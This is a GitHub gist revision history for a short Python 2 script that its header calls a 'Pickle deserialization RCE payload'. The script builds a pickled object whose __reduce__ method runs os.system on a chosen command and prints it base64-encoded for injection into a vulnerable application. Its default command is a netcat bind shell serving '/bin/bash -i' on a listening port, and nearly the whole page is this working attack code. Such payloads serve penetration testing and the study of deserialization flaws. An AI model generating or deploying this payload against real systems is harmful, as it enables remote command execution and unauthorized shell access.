Last active
July 14, 2025 16:19
-
-
Save mgeeky/cbc7017986b2ec3e247aab0b01a9edcd to your computer and use it in GitHub Desktop.
Revisions
-
mgeeky revised this gist
Aug 31, 2018 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,7 +6,6 @@ # import cPickle import sys import base64 @@ -15,6 +14,7 @@ class PickleRce(object): def __reduce__(self): import os return (os.system,(COMMAND,)) print base64.b64encode(cPickle.dumps(PickleRce())) -
Aug 1, 2016 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,7 +10,7 @@ import sys import base64 DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): -
Aug 1, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ #!/usr/bin/python # # Pickle deserialization RCE payload. # To be invoked with command to execute at it's first parameter. # Otherwise, the default one will be used. # import cPickle import os import sys import base64 DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 1234" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): def __reduce__(self): return (os.system,(COMMAND,)) print base64.b64encode(cPickle.dumps(PickleRce()))